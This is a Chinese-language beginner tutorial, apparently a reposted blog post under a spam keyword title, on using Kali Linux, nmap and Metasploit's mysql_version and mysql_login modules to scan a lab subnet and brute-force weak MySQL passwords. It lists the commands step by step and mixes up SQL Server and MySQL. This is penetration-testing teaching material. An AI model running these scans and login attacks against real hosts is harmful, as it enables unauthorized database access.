亚洲视频二区_亚洲欧洲日本天天堂在线观看_日韩一区二区在线观看_中文字幕不卡一区

一、背景介紹

Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework，簡稱叫做MSF。Metasploit作為全球最受歡迎的工具，不僅僅是因為它的方便性和強大性，更重要的是它的框架。它允許使用者開發自己的漏洞腳本，從而進行測試。那么如何利用Metasploit(msf)進行MySQL弱口令爆破呢？接下來讓我們一起學習！

二、資源裝備

1.安裝好 Kali linux 的虛擬機一臺

2.搭建好Sql server的靶機一個；

3.整裝待發的小白一個。

三、戰略安排

3.1 設置受害者靶機跟攻擊者主機的網絡模式為NAT模式，如下圖所示。

3.2 查看受害者主機的IP地址，如下圖所示。

命令：ifconfig

3.3 針對目標受害者主機進行信息收集，如下圖所示。

命令：nmap -sV IP

例子：nmap -sV 192.168.126.170-200

3.4 掃描結果如下圖所示，目標攻擊者主機開啟了3306危險端口。

3.5 利用Metasploit（msf）滲透框架對目標主機進行信息收集，如下圖所示。

命令：msfconsole

3.6 利用msf檢索SQL相關攻擊模塊，如下圖所示。

命令：search mysql_version

3.7 利用檢索到的漏洞利用模塊，如下圖所示。

命令：use auxiliary/scanner/mysql/mysql_version

3.8 查看相關參數，如下圖所示。

命令:show options

3.9 設置參數，如下圖所示。

命令：set rhosts 192.168.126.170-200

命令：set threads 50

3.10 運行攻擊模塊，如下圖所示。

命令：run

3.11 返回上層目錄，如下圖所示。

命令：back

3.12 檢索數據庫攻擊模塊，如下圖所示。

命令：search mysql_login

3.13 利用檢索到的攻擊模塊，如下圖所示。

命令：use auxiliary/scanner/mysql/mysql_login

3.14 查看相關參數，如下圖所示。

命令：show options

3.15 設置相關參數，如下圖所示。

3.16 設置好參數進行攻擊，如下圖所示。

命令：run

PS：到此學習完畢，謝謝觀看，獲取更多干貨請持續關注本號！

原創不易，各位看官記得好評加關注哦！你也可點擊了解更多，或搜索：Kali與編程，學習更多Kali Linux滲透與白帽編程技巧哦！